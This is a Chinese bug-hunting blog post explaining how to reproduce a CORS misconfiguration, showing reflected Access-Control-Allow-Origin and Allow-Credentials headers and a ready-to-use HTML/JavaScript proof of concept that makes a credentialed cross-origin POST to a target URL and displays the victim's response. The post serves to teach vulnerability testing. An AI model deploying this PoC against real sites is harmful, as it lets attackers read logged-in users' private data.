CORS跨域访问

这个漏洞是在挖漏洞的时候遇到的,大佬给我说这个漏洞厂商收。所以就来总结一波

我就来说说复现的姿势吧

找到存在漏洞的url

我们来看正常的回显

现在来改他的请求包   在请求包里面增加payload  看看回显

Access-Control-Allow-Origin: http://svdXXfL0.com

Access-Control-Allow-Credentials: true

现在即可证明存在此漏洞   但是我们要来构造一个POC  像点击劫持那样去访问自己构造的.html文件  我们的目的就是截取图中回显的马赛克里面的内容

现在构造POC  只需修改里面的漏洞url就行了

<!DOCTYPE html><html><head>    <title>CORS</title></head><body onload = "getData()"> </body></html><script type="text/javascript">    function getData(){    var xmlhttp;    if (window.xmlHttpRequest)      {      xmlhttp=new xmlHttpRequest();      }    else      {      xmlhttp=new ActiveXobject("Microsoft.xmlHTTP");      }    xmlhttp.onreadystatechange=function()      {      if (xmlhttp.readyState==4 && xmlhttp.status==200)        {            data=xmlhttp.responseText;            document.write(data);        }          }    xmlhttp.open("POST","漏洞url",true);    xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");     xmlhttp.send("funcNo=1000320&group_id=1&add_id=");}</script>

改后缀为html文件  访问之后

 

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值